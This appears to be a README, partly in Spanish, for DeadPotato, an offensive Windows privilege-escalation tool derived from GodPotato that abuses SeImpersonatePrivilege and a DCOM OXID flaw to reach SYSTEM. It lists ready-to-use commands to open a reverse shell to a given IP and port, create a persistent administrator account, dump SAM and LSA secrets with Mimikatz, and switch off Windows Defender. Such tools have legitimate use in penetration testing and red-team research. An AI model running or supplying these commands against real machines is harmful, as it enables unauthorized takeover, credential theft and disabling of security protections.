C:Userslypd0> GodPotato.exe ⠀⢀⣠⣤⣤⣄⡀⠀ _ _ ⣴⣿⣿⣿⣿⣿⣿⣦ | _ _ _||_) _ _|_ _ _|_ _ ⣿⣿⣿⣿⣿⣿⣿⣿ |_/(/_(_|(_|| (_) |_(_| |_(_) ⣇⠈⠉⡿⢿⠉⠁⢸ Open Source @ github.com/lypd0 ⠙⠛⢻⣷⣾⡟⠛⠋ -= Version: 1.2 =- ⠈⠁⠀⠀⠀ _,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_ (*) Example Usage(s): -={ deadpotato.exe -MODULE [ARGUMENTS] }=- -> deadpotato.exe -cmd "whoami" -> deadpotato.exe -rev 192.168.10.30:9001 -> deadpotato.exe -exe paylod.exe -> deadpotato.exe -newadmin lypd0:DeadPotatoRocks1 -> deadpotato.exe -shell -> deadpotato.exe -mimi sam -> deadpotato.exe -defender off -> deadpotato.exe -sharphound (*) Available Modules: - cmd: Execute a command as NT AUTHORITYSYSTEM. - rev: Attempts to establish a reverse shell connection to the provided host - exe: Execute a program with NT AUTHORITYSYSTEM privileges (Does not support interactivity). - newadmin: Create a new administrator user on the local system. - shell: Manages to achieve a semi-interactive shell (NOTE: Very bad OpSec!) - mimi: Attempts to dump SAM/LSA/SECRETS with Mimikatz. (NOTE: This will write mimikatz to disk!) - defender: Either enables or disables Windows Defender's real-time protection. - sharphound: Attempts to collect domain data for BloodHound.
¿El derecho SeImpersonatePrivilege
está habilitado en su contexto? Con DeadPotato , es posible lograr privilegios máximos en el sistema local.
La herramienta intentará iniciar un proceso elevado que se ejecuta en el contexto del usuario NT AUTHORITYSYSTEM
abusando de la falla RPCSS de DCOM en el manejo de OXID, permitiendo acceso sin restricciones a la máquina para que se realicen libremente operaciones críticas.-cmd
. Hay muchos módulos disponibles para su uso, como -rev IP:PORT
para generar un shell inverso elevado, -newadmin usr:pass
para crear un nuevo usuario administrador local para persistencia o -mimi sam
para volcar hashes SAM.
Para utilizar DeadPotato, el derecho SeImpersonatePrivilege debe estar habilitado en el contexto actual. Para verificar esto, se puede ejecutar el comando whoami /priv
. Si el privilegio está deshabilitado, la explotación no es posible en el contexto actual.
C:Userslypd0> whoami /priv <...SNIP...> SeImpersonatePrivilege Impersonate a client after authentication Enabled <...SNIP...>
Este proyecto "DeadPotato" es una herramienta construida sobre el código fuente de la obra maestra "GodPotato" de BeichenDream. Si te gusta este proyecto, asegúrate de mostrar también tu apoyo al proyecto original.
BeichenDream, Benjamin DELPY gentilkiwi
, desarrolladores de BloodHound.
Este proyecto está bajo la licencia Apache 2.0. Revise el archivo de LICENCIA para obtener más detalles.